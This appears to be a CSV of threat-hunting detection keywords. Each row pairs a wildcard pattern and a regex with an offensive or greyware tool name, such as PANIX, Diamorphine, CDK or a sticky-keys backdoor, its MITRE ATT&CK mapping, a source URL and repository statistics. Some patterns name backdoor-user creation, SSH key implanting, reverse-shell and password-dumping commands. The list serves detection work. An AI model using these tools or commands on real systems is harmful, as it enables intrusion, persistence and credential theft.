"*.sh --authorized-keys --custom --key *.ssh/authorized_keys*",".{0,1000}\.sh\s\-\-authorized\-keys\s\-\-custom\s\-\-key\s.{0,1000}\.ssh\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --backdoor-user --username *",".{0,1000}\.sh\s\-\-backdoor\-user\s\-\-username\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --crond --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crond\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --crontab*",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crontab.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --daily --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-daily\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --passwd-user --custom --passwd-string *",".{0,1000}\.sh\s\-\-passwd\-user\s\-\-custom\s\-\-passwd\-string\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --shell-profile --custom --command * --path */.bash_profile*",".{0,1000}\.sh\s\-\-shell\-profile\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/\.bash_profile.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --systemd --custom --command *",".{0,1000}\.sh\s\-\-systemd\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --systemd --default --ip * --port *",".{0,1000}\.sh\s\-\-systemd\s\-\-default\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --udev --custom --command *",".{0,1000}\.sh\s\-\-udev\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*.sh --xdg --custom --command * --path */etc/xdg/autostart/*",".{0,1000}\.sh\s\-\-xdg\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/etc\/xdg\/autostart\/.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/.ssh/dropbear*",".{0,1000}\/\.ssh\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/0xthirteen/*",".{0,1000}\/0xthirteen\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*/AbandonedCOMKeys/*",".{0,1000}\/AbandonedCOMKeys\/.{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*/ABPTTS.git*",".{0,1000}\/ABPTTS\.git.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*/ADCS.ps1*",".{0,1000}\/ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*/Add-KeeThiefLurker.ps1*",".{0,1000}\/Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*/AMSI-Provider.git*",".{0,1000}\/AMSI\-Provider\.git.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*/atnow.exe*",".{0,1000}\/atnow\.exe.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","1","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*/atnow.zip*",".{0,1000}\/atnow\.zip.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","1","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*/backdoor.bat*",".{0,1000}\/backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*/backdoor.exe*",".{0,1000}\/backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*/bin/dropbear*",".{0,1000}\/bin\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/bin/tshd*",".{0,1000}\/bin\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","551","127","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*/browserhistory.csv*",".{0,1000}\/browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/cdk_darwin_amd64*",".{0,1000}\/cdk_darwin_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/cdk_linux_386*",".{0,1000}\/cdk_linux_386.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/cdk_linux_amd64*",".{0,1000}\/cdk_linux_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/cdk-fabric run reverse-shell*",".{0,1000}\/cdk\-fabric\srun\sreverse\-shell.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/cdk-fabric run shim-pwn*",".{0,1000}\/cdk\-fabric\srun\sshim\-pwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/chromepasswordlist.csv*",".{0,1000}\/chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/chromepasswords.py*",".{0,1000}\/chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/COM-Hunter.csproj*",".{0,1000}\/COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*/COM-Hunter.exe*",".{0,1000}\/COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*/COM-Hunter.git*",".{0,1000}\/COM\-Hunter\.git.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*/COM-Hunter.sln*",".{0,1000}\/COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*/COM-Object-hijacking.git*",".{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","57","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z"
"*/Cronos-Rootkit*",".{0,1000}\/Cronos\-Rootkit.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*/Cronos-Rootkit/*",".{0,1000}\/Cronos\-Rootkit\/.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*/Cronos-x64.zip*",".{0,1000}\/Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/DAMP.git*",".{0,1000}\/DAMP\.git.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/Diamorphine.git*",".{0,1000}\/Diamorphine\.git.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/DockerPwn.py*",".{0,1000}\/DockerPwn\.py.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/DoUCMe.git*",".{0,1000}\/DoUCMe\.git.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*/dropbear.git*",".{0,1000}\/dropbear\.git.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","1","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/dropbear.init*",".{0,1000}\/dropbear\.init.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/dropbear.log*",".{0,1000}\/dropbear\.log.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/dropbear/releases/*",".{0,1000}\/dropbear\/releases\/.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","1","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/dropbear_dss_host_key*",".{0,1000}\/dropbear_dss_host_key.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/dropbear_rsa_host_key*",".{0,1000}\/dropbear_rsa_host_key.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/etc/default/dropbear*",".{0,1000}\/etc\/default\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/etc/dropbear/*",".{0,1000}\/etc\/dropbear\/.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/etc/xdg/autostart/evilxdg.desktop*",".{0,1000}\/etc\/xdg\/autostart\/evilxdg\.desktop.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/http-ntlm/ntlmtransport*",".{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/ImplantSSP.exe*",".{0,1000}\/ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/JumpSession.cna*",".{0,1000}\/JumpSession\.cna.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
